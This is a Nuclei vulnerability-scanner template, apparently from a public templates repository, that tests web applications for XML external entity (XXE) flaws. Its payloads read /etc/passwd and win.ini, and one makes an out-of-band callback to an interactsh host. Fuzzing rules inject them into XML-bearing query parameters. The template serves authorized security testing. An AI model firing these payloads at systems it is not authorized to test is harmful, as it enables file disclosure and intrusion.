daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/dast/vulnerabilities/xxe/generic-xxe.yaml

59 lines
1.5 KiB
YAML
Raw Blame History

id: generic-xxe
info:
name: Generic XML External Entity - (XXE)
author: pwnhxl,AmirHossein Raeisi
severity: medium
reference:
- https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py
metadata:
max-request: 2
tags: dast,xxe
variables:
rletter: "{{rand_base(6,'abc')}}"
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
payloads:
xxe:
- '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:///c:/windows/win.ini"> ]><x>&{{rletter}};</x>'
- '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:////etc/passwd"> ]><x>&{{rletter}};</x>'
- '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "http://{{interactsh-url}}"> ]><x>&{{rletter}};</x>'
fuzzing:
- part: query
keys-regex:
- "(.*?)xml(.*?)"
fuzz:
- "{{xxe}}"
- part: query
values:
- "(<!DOCTYPE|<?xml|%3C!DOCTYPE|%3C%3Fxml)(.*?)>"
fuzz:
- "{{xxe}}"
stop-at-first-match: true
matchers:
- type: regex
name: linux
part: body
regex:
- 'root:.*?:[0-9]*:[0-9]*:'
- type: word
name: windows
part: body
words:
- 'for 16-bit app support'
- type: word
part: interactsh_protocol
words:
- "http"
# digest: 4a0a00473045022100fc0d6d7e83a8c8d79bdd40f6ee0f749ce6fa2cb1c21a9512b043af0fbf2f37980220225bcf70bc1a1a1a46791f3707b12a5c302d1a9da94851d2c33e450749551c76:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink